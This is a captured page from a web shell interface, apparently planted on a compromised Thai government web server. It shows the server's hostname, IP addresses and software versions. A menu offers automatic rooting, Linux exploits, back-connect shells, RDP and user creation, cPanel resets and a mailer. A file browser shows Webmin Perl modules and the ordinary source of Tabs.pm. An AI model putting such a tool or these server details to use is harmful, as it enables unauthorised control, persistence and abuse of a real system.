Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
WebminUI /
[ HOME SHELL ]
Name
Size
Permission
Action
All.pm
969
B
-rw-r--r--
Button.pm
1.16
KB
-rw-r--r--
Checkbox.pm
1.19
KB
-rw-r--r--
Checkboxes.pm
2.49
KB
-rw-r--r--
Columns.pm
1.43
KB
-rw-r--r--
ConfirmPage.pm
1.14
KB
-rw-r--r--
Date.pm
2.11
KB
-rw-r--r--
DynamicBar.pm
2.35
KB
-rw-r--r--
DynamicHTML.pm
1.16
KB
-rw-r--r--
DynamicText.pm
2.42
KB
-rw-r--r--
DynamicWait.pm
2.49
KB
-rw-r--r--
ErrorPage.pm
565
B
-rw-r--r--
File.pm
1.57
KB
-rw-r--r--
Form.pm
7.94
KB
-rw-r--r--
Group.pm
1.44
KB
-rw-r--r--
Icon.pm
1.09
KB
-rw-r--r--
Input.pm
2.27
KB
-rw-r--r--
InputTable.pm
2.79
KB
-rw-r--r--
JavascriptButton.pm
970
B
-rw-r--r--
LinkTable.pm
6.39
KB
-rw-r--r--
Menu.pm
1.48
KB
-rw-r--r--
Multiline.pm
873
B
-rw-r--r--
OptTextarea.pm
2.85
KB
-rw-r--r--
OptTextbox.pm
1.94
KB
-rw-r--r--
Page.pm
8.41
KB
-rw-r--r--
Password.pm
639
B
-rw-r--r--
PlainText.pm
1.7
KB
-rw-r--r--
Properties.pm
2.6
KB
-rw-r--r--
Radios.pm
1.59
KB
-rw-r--r--
ResultPage.pm
520
B
-rw-r--r--
Section.pm
3.54
KB
-rw-r--r--
Select.pm
2.66
KB
-rw-r--r--
Submit.pm
788
B
-rw-r--r--
Table.pm
15.87
KB
-rw-r--r--
TableAction.pm
1.51
KB
-rw-r--r--
Tabs.pm
2.86
KB
-rw-r--r--
Textarea.pm
2.16
KB
-rw-r--r--
Textbox.pm
1.63
KB
-rw-r--r--
Time.pm
4.12
KB
-rw-r--r--
TitleList.pm
1.51
KB
-rw-r--r--
Upload.pm
1.48
KB
-rw-r--r--
User.pm
1.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Tabs.pm
package WebminUI::Tabs; use WebminCore; =head2 new WebminUI::Tabs([&tabs]) Displayed at the top of a page, to allow selection of various pages =cut sub new { my ($self, $tabs) = @_; if (defined(&WebminUI::Theme::Tabs::new)) { return new WebminUI::Theme::Tabs(@_[1..$#_]); } $self = { 'tabs' => [ ], 'tab' => 0 }; bless($self); $self->set_tabs($tabs) if (defined($tabs)); return $self; } =head2 add_tab(name, link) =cut sub add_tab { my ($self, $name, $link) = @_; push(@{$self->{'tabs'}}, [ $name, $link ]); } =head2 html() Returns the HTML for the top of the page =cut sub top_html { my ($self) = @_; my $rv; $rv .= "<table border=0 cellpadding=0 cellspacing=0 width=100% height=20><tr>"; $rv .= "<td valign=bottom>"; $rv .= "<table border=0 cellpadding=0 cellspacing=0 height=20><tr>"; my $i = 0; my ($high, $low) = ("#cccccc", "#9999ff"); my ($lowlc, $lowrc) = ( "/images/lc1.gif", "/images/rc1.gif" ); my ($highlc, $highrc) = ( "/images/lc2.gif", "/images/rc2.gif" ); foreach my $t (@{$self->get_tabs()}) { if ($i == $self->get_tab()) { # This is the selected tab $rv .= "<td valign=top bgcolor=$high>". "<img src=$highlc alt=\"\"></td>"; if ($self->get_link()) { # Link $rv .= "<td bgcolor=$high> ". "<a href=$t->[1]><b>$t->[0]</b></a> </td>"; } else { # Don't link $rv .= "<td bgcolor=$high> <b>$t->[0]</b> </td>"; } $rv .= "<td valign=top bgcolor=$high>". "<img src=$highrc alt=\"\"></td>\n"; } else { # Not selected $rv .= "<td valign=top bgcolor=$low>". "<img src=$lowlc alt=\"\"></td>"; $rv .= "<td bgcolor=$low> ". "<a href=$t->[1]><b>$t->[0]</b></a> </td>"; $rv .= "<td valign=top bgcolor=$low>". "<img src=$lowrc alt=\"\"></td>\n"; } $i++; if ($self->{'wrap'} && $i%$self->{'wrap'} == 0) { # New row $rv .= "</tr><tr>"; } } $rv .= "</tr></table></td>\n"; $rv .= "</tr></table>\n"; $rv .= "<table border=1 cellpadding=10 cellspacing=0 width=100%><tr><td>\n"; return $rv; } =head2 bottom_html() Returns the HTML for the bottom of the page =cut sub bottom_html { my ($self) = @_; my $rv = "</td></tr></table>\n"; return $rv; } =head2 set_tab(number|link) Sets the tab that is currently highlighted =cut sub set_tab { my ($self, $tab) = @_; if ($tab =~ /^\d+$/) { $self->{'tab'} = $tab; } else { for(my $i=0; $i<@{$self->{'tabs'}}; $i++) { if ($self->{'tabs'}->[$i]->[1] eq $tab) { $self->{'tab'} = $i; } } } } sub get_tab { my ($self) = @_; return $self->{'tab'}; } =head2 set_link(link) If called with a non-zero parameter, even the highlighted tab will be a link =cut sub set_link { my ($self, $link) = @_; $self->{'link'} = $link; } sub get_link { my ($self) = @_; return $self->{'link'}; } sub set_tabs { my ($self, $tabs) = @_; $self->{'tabs'} = $tabs; } sub get_tabs { my ($self) = @_; return $self->{'tabs'}; } 1;
Close